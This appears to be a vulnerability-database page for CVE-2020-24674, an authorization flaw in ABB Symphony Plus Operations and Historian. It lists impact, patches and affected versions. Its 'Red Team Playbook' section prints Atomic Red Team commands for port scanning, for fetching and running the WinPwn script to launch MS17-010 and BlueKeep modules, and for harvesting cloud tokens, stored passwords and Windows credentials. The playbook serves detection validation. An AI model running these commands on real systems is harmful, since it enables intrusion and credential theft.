CVE-2020-24674
Overview
This vulnerability stems from improper authorization checks within ABB Ability™ Symphony® Plus Operations and Historian components. Specifically, certain client commands fail to verify user permissions correctly, allowing authenticated users with limited privileges to bypass intended access controls. The root cause lies in insufficient enforcement of authorization logic in command processing modules of these products, affecting versions 1.1 through 3.1 across Operations and Historian components.
Vulnerability Description
In S+ Operations and S+ Historian, not all client commands correctly check user permission as expected. Authenticated but Unauthorized remote users could execute a Denial-of-Service (DoS) attack, execute arbitrary code, or obtain more privilege than intended on the machines.
Impact
An attacker with valid credentials but insufficient privileges can exploit this vulnerability to perform denial-of-service attacks, execute arbitrary code, or escalate privileges on affected systems. Network access to the vulnerable ABB Ability™ Symphony® Plus components is required, and no user interaction is necessary. This can result in operational disruptions, unauthorized control over critical industrial processes, and potential compromise of system integrity, consistent with the CVSS vector indicating network attack complexity is low and privileges required are low.
Solution
ABB has released security advisories 2PAA123980 and 2PAA123982 addressing these vulnerabilities. Users should apply the patches provided for Symphony® Plus Operations versions 1.1, 2.0, and 2.1 SP1, as well as Symphony® Plus Historian versions 3.0 and 3.1, as detailed in the respective ABB advisories. The advisories include updated software versions and instructions for secure configuration to mitigate unauthorized command execution risks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant vulnerability exists within certain versions of S+ Operations and S+ Historian, primarily related to inadequate user permission checks for client commands. This flaw allows authenticated users, who should not have the necessary privileges, to execute commands that can lead to unauthorized actions. The failure to properly validate user permissions creates a scenario where an attacker could potentially launch a Denial-of-Service (DoS) attack, execute arbitrary code, or escalate privileges beyond what is intended. The implications of this vulnerability are particularly concerning given the critical nature of the systems involved, which are often used in industrial and operational environments.
The attack vectors associated with this vulnerability are varied and can be exploited by leveraging legitimate user credentials. An attacker could gain access to the system through social engineering or other means, allowing them to authenticate as a user. Once authenticated, the attacker could issue commands that the system does not adequately validate against the user's permissions. This could lead to a range of malicious outcomes, including service disruption through DoS attacks, unauthorized data access, or even full system compromise through arbitrary code execution. The ability to escalate privileges further exacerbates the risk, as it could allow an attacker to gain control over critical infrastructure components.
In real-world scenarios, the impact of this vulnerability can be profound. Organizations relying on S+ Operations and S+ Historian for their operational technology (OT) are at risk of significant business disruptions. A successful exploitation could lead to downtime, loss of data integrity, and potential safety hazards, especially in environments where these systems control industrial processes. The financial implications of such incidents can be severe, not only due to immediate operational losses but also because of potential regulatory fines, reputational damage, and the costs associated with incident response and recovery efforts.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular audits of user permissions and access controls are essential to ensure that only authorized personnel have access to sensitive commands. Additionally, monitoring and logging of command execution can help identify suspicious activities that may indicate exploitation attempts. Employing intrusion detection systems (IDS) that are tailored to recognize abnormal patterns of behavior within the S+ Operations and S+ Historian environments can further enhance security posture. Furthermore, organizations should prioritize applying patches and updates provided by the vendor, as these often include critical fixes for known vulnerabilities.
In conclusion, the vulnerability present in S+ Operations and S+ Historian poses a significant threat to organizations that utilize these systems. The potential for unauthorized access and control, coupled with the ability to disrupt operations, highlights the need for robust security measures. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to defend against such vulnerabilities. Proactive detection and mitigation strategies will be crucial in safeguarding against the risks associated with this flaw, ensuring the integrity and availability of critical operational systems.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Abb | Symphony \+ Historian | 3.0 |
cpe:2.3:a:abb:symphony_\+_historian:3.0:*:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Historian | 3.1 |
cpe:2.3:a:abb:symphony_\+_historian:3.1:*:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Operations | 1.1 |
cpe:2.3:a:abb:symphony_\+_operations:1.1:*:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Operations | 2.0 |
cpe:2.3:a:abb:symphony_\+_operations:2.0:*:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Operations | 2.1 |
cpe:2.3:a:abb:symphony_\+_operations:2.1:sp1:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Operations | 2.1 |
cpe:2.3:a:abb:symphony_\+_operations:2.1:sp2:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Operations | 3.0 |
cpe:2.3:a:abb:symphony_\+_operations:3.0:*:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Operations | 3.1 |
cpe:2.3:a:abb:symphony_\+_operations:3.1:*:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Operations | 3.2 |
cpe:2.3:a:abb:symphony_\+_operations:3.2:*:*:*:*:*:*:*
|
|
|
Abb | Symphony \+ Operations | 3.3 |
cpe:2.3:a:abb:symphony_\+_operations:3.3:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-24674 |
| search.abb.com |
GitHub CVE
x_refsource_MISC
|
https://search.abb.com/library/Download.aspx?DocumentID=2PAA123980&LanguageCode=en&DocumentPartId=&Action=Launch |
| search.abb.com |
GitHub CVE
x_refsource_MISC
|
https://search.abb.com/library/Download.aspx?DocumentID=2PAA123982&LanguageCode=en&DocumentPartId=&Action=Launch |